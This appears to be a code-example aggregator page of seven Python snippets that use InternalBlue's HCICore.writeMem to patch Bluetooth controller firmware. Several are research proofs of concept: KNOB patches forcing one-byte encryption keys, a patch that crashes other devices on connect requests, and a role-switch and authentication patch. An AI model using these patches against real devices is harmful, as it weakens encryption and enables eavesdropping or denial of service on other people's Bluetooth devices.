Python HCICore.writeMem Examples

Programming Language: Python

Namespace/Package Name: internalblue.hcicore

Class/Type: HCICore

Method/Function: writeMem

Examples at hotexamples.com: 7

Python HCICore.writeMem - 7 examples found. These are the top rated real world Python examples of internalblue.hcicore.HCICore.writeMem extracted from open source projects. You can rate examples to help us improve the quality of examples.

Frequently Used Methods

Show Hide

patchRom(13)

writeMem(7)

device_list(3)

HCICore(2)

interface(2)

readMem(2)

registerHciCallback(2)

_teardownSockets(1)

connect(1)

critical(1)

launchRam(1)

rnd_done(1)

sendHciCommand(1)

shutdown(1)

Example #1

Show file

# setup sockets
if not internalblue.connect():
    internalblue.logger.critical("No connection to target device.")
    exit(-1)

internalblue.logger.info(
    "Installing patch which ensures that send_LMP_encryption_key_size_req is always len=1!"
)

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x3B3D4)  # connection struct key entropy
internalblue.patchRom(Address(0x3B3D4), patch)

# modify global variable for own setting
internalblue.writeMem(0x204A5F, b'\x01')  # global key entropy

internalblue.logger.info(
    "-----------------------\n"
    "Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
    "Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
    "For more details, see special instructions for BlueZ.\n"
    "-----------------------KNOB-----------------------\n"
    "Automatically continuing on KNOB interface...\n"
    "Use the 'knob' command to *debug* the attack, i.e.:\n"
    "    knob --hnd 0x0c\n"
    "...shows the key size of handle 0x000c.\n")


class KnobCommands(CommandSet):
    knob_parser = argparse.ArgumentParser()

Example #2

Show file

File: rand.py Project: xodyd/internalblue

""" % (MEM_ROUNDS, MEM_RNG)

internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    internalblue.logger.critical("No connection to target device.")
    exit(-1)

internalblue.logger.info("installing assembly patches...")

# Install the RNG code in RAM
code = asm(ASM_SNIPPET_RNG, vma=ASM_LOCATION_RNG)
if not internalblue.writeMem(
        address=ASM_LOCATION_RNG, data=code, progress_log=None):
    internalblue.logger.critical("error!")
    exit(-1)

# Disable original RNG
patch = asm(
    "bx lr; bx lr",
    vma=FUN_RNG)  # 2 times bx lr is 4 bytes and we can only patch 4 bytes
if not internalblue.patchRom(FUN_RNG, patch):
    internalblue.logger.critical("Could not disable original RNG!")
    exit(-1)

internalblue.logger.info("Installed all RNG hooks.")
os.system("sudo rfkill block wifi")
internalblue.logger.info("Disabled Wi-Fi core.")
"""

Example #3

Show file

File: BLE_Reception_PoC.py Project: unixb0y/internalblue

    // undo registers for our own routine
    mov   r0, r7
    pop   {r1-r7, lr}

    // branch back to _connTaskRxDone + 4
    b     0x35fc0

"""

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")
    exit(-1)

# Install hooks
code = asm(ASM_HOOKS, vma=HOOKS_LOCATION)
log.info("Writing hooks to 0x%x..." % HOOKS_LOCATION)
if not internalblue.writeMem(HOOKS_LOCATION, code):
    log.critical("Cannot write hooks at 0x%x" % HOOKS_LOCATION)
    exit(-1)

log.info("Installing hook patch...")
patch = asm("b 0x%x" % HOOKS_LOCATION, vma=RX_DONE_HOOK_ADDRESS)
if not internalblue.patchRom(RX_DONE_HOOK_ADDRESS, patch):
    log.critical("Installing patch for _connTaskRxDone failed!")
    exit(-1)

log.info("--------------------")
log.info(
    "To see statistics, execute 'internalblue' and run 'log_level debug'.")

Example #4

Show file

internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")
    exit(-1)

progress_log = log.info(
    "Installing assembly patches to crash other device on connect requests...")

# Older devices like the Nexus 5 only accept LMP BPCS from Broadcom,
# they don't know about Cypress yet...
progress_log = log.info("Changing vendor ID from Cypress to Broadcom.")
if not internalblue.writeMem(
        address=0x2020f0, data='\x0f\x00\x00\x00', progress_log=progress_log):
    progress_log.critical("error!")
    exit(-1)

progress_log = log.info("Writing ASM snippet for LMP BPSC table lookup.")
code = asm(ASM_SNIPPET_LMP_00_LOOKUP, vma=ASM_LOCATION_LMP_00_LOOKUP)
if not internalblue.writeMem(address=ASM_LOCATION_LMP_00_LOOKUP,
                             data=code,
                             progress_log=progress_log):
    progress_log.critical("error!")
    exit(-1)

progress_log = log.info(
    "Installing predefined hook for LMP BPSC table lookup.")
if not internalblue.writeMem(address=HOOK_LMP_00_LOOKUP,
                             data=p32(ASM_LOCATION_LMP_00_LOOKUP + 1),

Example #5

Show file

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")
    exit(-1)

log.info(
    "Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!"
)

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x7402A)  # connection struct key entropy
internalblue.patchRom(Address(0x7402A), patch)

# modify global variable for own setting
internalblue.writeMem(0x280F13, b'\x01')  # global key entropy

log.info(
    "-----------------------\n"
    "Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
    "Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
    "For more details, see special instructions for BlueZ.\n"
    "-----------------------KNOB-----------------------\n"
    "Automatically continuing on KNOB interface...\n"
    "Use the 'knob' command to *debug* the attack, i.e.:\n"
    "    knob --hnd 0x0c\n"
    "...shows the key size of handle 0x000c.\n")


class CmdKnob(cmd.Cmd):
    """

Example #6

Show file

File: KNOB_PoC.py Project: unixb0y/internalblue

"""

internalblue = HCICore()
internalblue.interface = internalblue.device_list()[0][
    1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")
    exit(-1)

log.info(
    "Installing patch which ensures that send_LMP_encryptoin_key_size_req is always len=1!"
)

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x689F0)  # connection struct key entropy
internalblue.patchRom(0x689F0, patch)

# modify global variable for own setting
internalblue.writeMem(0x204127, '\x01')  # global key entropy

internalblue.shutdown()
exit(-1)
log.info(
    "-----------------------\n"
    "Installed KNOB PoC. If connections to other devices succeed, they are vulnerable to KNOB.\n"
    "Monitoring device behavior is a bit tricky on Linux, LMP messages might appear in btmon.\n"
    "For more details, see special instructions for BlueZ.\n")

Example #7

Show file

log.info("BEGIN patchrom.")

# patch1: make sure we always switch to master role
code1 = b"""
        @Part 1: Make sure we always switch roles
        mov r6, #0x0
        sub sp, #0x18
        add r0, #0xc
        b 0x2e7ad
        """
addrcode1 = 0x2006d0
taddrcode1 = addrcode1 + 1  # 0x2006d1
# write code1 into addrcode1 (SRAM)
code1Bytes = asm(code1, addrcode1)
internalblue.writeMem(addrcode1, code1Bytes)
# patch rom
addrpatch1 = 0x2e7a8
patch1 = asm("b {}".format(str(hex(taddrcode1))), vma=addrpatch1)
internalblue.patchRom(addrpatch1, patch1)

# patch 2: immediately authenticate after setup

code1len = len(code1Bytes)
# 4-byte align
code1len += 4 - (code1len % 4)

code2 = b"""
        @save lr
        push {lr}